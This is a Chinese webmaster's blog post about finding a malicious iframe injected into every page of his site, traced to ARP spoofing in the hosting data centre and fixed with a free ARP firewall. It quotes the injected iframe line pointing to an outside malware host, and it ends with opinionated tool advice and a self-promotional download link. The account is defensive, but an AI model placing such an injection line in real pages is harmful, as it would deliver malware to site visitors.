昨天晚上11點(diǎn)多了。正要睡覺(jué),突然一個(gè)網(wǎng)友電話過(guò)來(lái)了。說(shuō)網(wǎng)頁(yè)吧出問(wèn)題,被掛馬了。我一聽(tīng)嚇了一大跳!馬上起床!
我進(jìn)入網(wǎng)頁(yè)吧一訪問(wèn),真的掛馬了,全部網(wǎng)頁(yè)都有馬出現(xiàn)iframe src=http://s82mnl12.cn/cn4.htm width=50 height=0 border=0>/iframe> ,然后馬上登陸服務(wù)器,看源代碼,暈了。沒(méi)有發(fā)現(xiàn)有掛馬的痕跡.為了怕影響網(wǎng)頁(yè)吧的用戶,先把網(wǎng)頁(yè)吧這個(gè)網(wǎng)站停了.
馬上問(wèn)QQ上的幾個(gè)做服務(wù)器的高手朋友,發(fā)現(xiàn)全部網(wǎng)頁(yè)掛了個(gè)馬,但是我打開(kāi)網(wǎng)頁(yè)看源文件卻沒(méi)有,怎么回事情?后來(lái)知道網(wǎng)頁(yè)里沒(méi)有 訪問(wèn)有馬,說(shuō)明機(jī)房?jī)?nèi)有ARP攻擊,裝 360安全衛(wèi)士 有ARP防火墻 !
沒(méi)管了.馬上安裝360,一提示,果然是ARP攻擊,然后打開(kāi)網(wǎng)頁(yè)吧訪問(wèn),郁悶.還是有木馬.馬上關(guān)閉.這里我要說(shuō)一句,360的ARP簡(jiǎn)直就是垃圾,基本沒(méi)用的。千萬(wàn)別用。用和沒(méi)用是一樣的!不過(guò)查出了ARP攻擊的人的網(wǎng)卡地址.
然后半夜聯(lián)系機(jī)房,告訴他們APR攻擊的網(wǎng)卡,沒(méi)用.那機(jī)房的說(shuō)是新技術(shù),不會(huì)查IP.不懂,要明天.我超郁悶!
沒(méi)辦法自己繼續(xù).繼續(xù)網(wǎng)上找軟件,找到了金山arp防火墻,需要的可以去網(wǎng)頁(yè)吧下。如果你也被攻擊的話。一安裝,然后打開(kāi).沒(méi)問(wèn)題了。完全防御!最重要的是這個(gè)工具免費(fèi)啊。
朋友總結(jié):這個(gè)ARP攻擊 不是代碼的問(wèn)題 是服務(wù)器輸出后,經(jīng)過(guò)網(wǎng)關(guān)的時(shí)候被加了代碼 所以網(wǎng)頁(yè)里是沒(méi)有代碼的 是被別的機(jī)器冒充了網(wǎng)關(guān) 轉(zhuǎn)發(fā)修改了數(shù)據(jù)!
終于解決問(wèn)題了,一看表凌晨2點(diǎn)30了.一起3個(gè)小時(shí)!驚心動(dòng)魄啊!
如果站長(zhǎng)你的站被掛馬了,而在源代碼里沒(méi)有發(fā)現(xiàn)木馬,你就應(yīng)該懷疑是不是ARP攻擊了。最直接的辦法是告訴機(jī)房,要他們撥攻擊的人的線.第二個(gè)辦法就是安裝金山arp防火墻!
金山arp防火墻下載: http://www./ruanjian/anquan/200806/6616.html
(轉(zhuǎn)文章的朋友這個(gè)金山arp防火墻下載的連接別去掉了,因?yàn)楹芏嗳硕夹枰@個(gè)軟件,第二我打字也不容易,算是給我點(diǎn)點(diǎn)流量吧)